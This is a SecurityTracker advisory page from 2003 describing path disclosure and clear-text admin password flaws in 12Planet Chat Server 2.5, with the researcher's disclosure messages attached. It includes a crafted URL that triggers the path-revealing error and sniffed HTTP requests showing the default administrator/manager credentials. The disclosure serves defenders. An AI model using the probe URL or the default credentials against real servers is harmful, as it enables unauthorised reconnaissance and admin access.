SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Instant Messaging/IRC/Chat)  >   Chat Server (12Planet) Vendors:   12Planet
12Planet Chat Server Sends Administrative Password Over the Network in Clear Text
SecurityTracker Alert ID:  1006554
SecurityTracker URL:  http://securitytracker.com/id/1006554
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 11 2003
Impact:   Disclosure of authentication information, Disclosure of system information, User access via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.5
Description:   Dennis Rand at Infowarefare.dk reported two vulnerabilities in the 12Planet Chat Server. A remote user sniffing the network can obtain the administrative password. A remote user can also determine the installation path.

It is reported that the server's login page sends the password to the server in clear text without encryption. This also occurs when a user enters expert mode and changes the administrative password.

A remote user can determine the installation directory with the following type of URL:

http://[target]:8080/qwe/qwe/qwe/index.html
Impact:   A remote user with the ability to sniff the network between the administrator and the server can determine the administrator's password.

A remote user can determine the installation path.
Solution:   No vendor solution was available at the time of this entry. The vendor has reportedly suggested that customers use an SSL proxy (such as the Apache proxy) to protect administrator login credentials.
Vendor URL:  www.12planet.com/en/software/chat/index.html (Links to External Site)
Cause:   Access control error, Exception handling error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000), Windows (XP)

Message History:   None.

 Source Message Contents
Date:  Fri, 11 Apr 2003 13:21:29 +0200
Subject:  Root directory revealing vulnerability Found in 12Planet Chat Server




                     Root directory revealing vulnerability
                       Found in 12Planet Chat Server 2.5
  		           http://www.12planet.com
		
                           Discovered by Dennis Rand
                              www.Infowarfare.dk
------------------------------------------------------------------------

-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
Offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
Portals willing to offer "sticky" services to their visitors as well
As secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat c
Conferences by inviting celebrities, experts to talk with visitors and
Moderate visitor questions through a moderation process.

It is possible getting the Root directory revealed by sending
At specific URL request

-----[AFFECTED SYSTEMS
Vulnerable systems:
  *  12Planet Chat Server 2.5

Immune systems:
  *

-----[SEVERITY
Low - An attacker has the possibility to find the location on the server
       On where the Chat Server is installed.


-----[DESCRIPTION OF WHAT THE VULNERABILITY IS

The following transcript demonstrates a sample exploitation of the
Vulnerabilities:
-------------------------------------------------------------------
Anything less then 3 times /qwe then you will only get a
HTTP 500 - Internal server error

Proof-Of-Concept exploit:
[Input in browser]
http://vuln-host:8080/qwe/qwe/qwe/index.html

[Output]
Error: 500
Internal Servlet Error:

java.io.IOException: bad path: C:\Program Files\12Planet Chat Server
v2.5.1\www\qwe\qwe\qwe\index.html
	at java/io/File.canonPath
	at java/io/File.getCanonicalPath
	at com/sun/web/core/DefaultServlet.doGet
	at javax/servlet/http/HttpServlet.service
	at javax/servlet/http/HttpServlet.service
	at com/sun/web/core/ServletWrapper.handleRequest
	at com/sun/web/core/Context.handleRequest
	at com/sun/web/server/ConnectionHandler.run


--------------------------------------------------------------------

-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.


-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. 12Planet will provide assistance
to all the customers that are interested in the patch
(email to : support@12planet.com)
Best regards, Lei
12Planet

-----[DISCLOSURE TIMELINE
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.


-----

                       Clear text password vulnerability
                       found in 12Planet Chat Server 2.5
		         http://www.12planet.com
		
                           Discovered by Dennis Rand
                              www.Infowarfare.dk
------------------------------------------------------------------------

-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat c
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.

When starting the Administration site of the Chat Server the login
and password is sent over the net in clear text.

-----[AFFECTED SYSTEMS
Vulnerable systems:
  *  12Planet Chat Server 2.5

Immune systems:
  *

-----[SEVERITY
Low/Medium - An attacker is able to put a network sniffer on the
              network and sniff the username and password, because
              it is sent in a clear text form.



-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
When sending Administrator password on the login page
the password is send in clear text.
The same problem is when you enter expert mode to change
the administrator password it will again be send in clear text.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
[Used Ethereal to sniff the traffic between the host and server]

LOGIN PAGE:
Here is the capture of the first line of defense from the 12Planet
Chat server:
---------------------------- CUT HERE
----------------------------------------
POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://193.88.206.253:8080/servlet/one2planet.infolet.InfoServlet?
page=one2planet.community.core.PHLogin&technology=html&domain=default&
language=english&url=%40HTTP%3A%2F%2F193.88.206.253%3A8080%2Fservlet%2
Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21
template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 193.88.206.253:8080
Content-Length: 292
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SESSIONID=To1010mC7187873103878648At

page=one2planet.community.core.PHLogin&table=user&url=@HTTP%3A%2F%2F<vuln-ho
st-ip>
%3A8080%2Fservlet%2Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools
.PSDynPage%21
template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html&
vserver=&username=administrator&passwd=manager
---------------------------- CUT HERE
----------------------------------------

ADMINISTRATION PAGE
Now if the administrator wants to change the password from the default one.
He or She enters the expert mode, from with in here it is possible to change

the password, but again the password is send in clear text.'
---------------------------- CUT HERE
----------------------------------------
page=one2planet.community.core.PHChangePassword&nickname=administrator&
psswd0=manager&psswd1=Trustno1@&psswd2=Trustno1@&submit3=OK
HTTP/1.0 200 OK
---------------------------- CUT HERE
----------------------------------------

--------------------------------------------------------------------

-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

-----[WORK AROUNDS
As The vendor writes they recommend their customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers


-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. We recommend our customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers, this to
solve the second issue you listed. 12Planet will provide assistance to
all the customers that are interested in the patch (email to :
support@12planet.com)
Best regards, Lei
12Planet



-----[DISCLOSURE TIMELINE
24/02/2003 Found the Vulnerability.
25/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand

-----[DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC